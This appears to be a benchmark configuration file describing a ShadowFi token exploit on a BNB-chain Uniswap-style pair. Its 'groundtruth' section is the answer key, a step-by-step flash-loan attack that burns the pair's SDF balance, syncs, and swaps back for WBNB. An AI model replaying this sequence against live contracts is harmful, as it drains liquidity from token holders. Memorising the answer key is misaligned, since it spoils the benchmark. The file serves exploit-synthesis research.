# Information for benchmarks building.
project_name: "ShadowFi"

ctrt_name2cls:
  - ["sdf", "ShadowFi"]
  - ["wbnb", "WBNB"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["sdf", "new ShadowFi(1662075000)"]
  - ["wbnb", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]

extra_actions:
  - "function burn_pair_sdf(uint256 amount) internal {
    sdf.burn(address(pair), amount);
    }"

extra_deployments:
  - "sdf.afterDeploy(address(router), address(pair));"

extra_statements:
  - "vm.warp(blockTimestamp);"

attack_goal_str: "wbnb"

groundtruth:
  - ["borrow", "owner", "wbnb", "1e16"]
  - ["swap", "pair", "wbnb", "sdf", "1e16"]
  - ["burn", "pair", "sdf", "sdf.balanceOf(address(pair)) - 1"]
  - ["sync", "pair"]
  - ["swap", "pair", "sdf", "wbnb", "sdf.balanceOf(attacker)"]
  - ["payback", "owner", "wbnb", "1.003e16"]

# Information for search space building.
roles:
  "wbnb":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "sdf":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
    is_burnable: true
  "pair":
    is_swappair: true
    uniswap_order: ["sdf", "wbnb"]
    support_swaps:
      "wbnb": ["sdf", "wbnb"]
      "sdf": ["sdf", "wbnb"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true

pattern: "Token Burn"
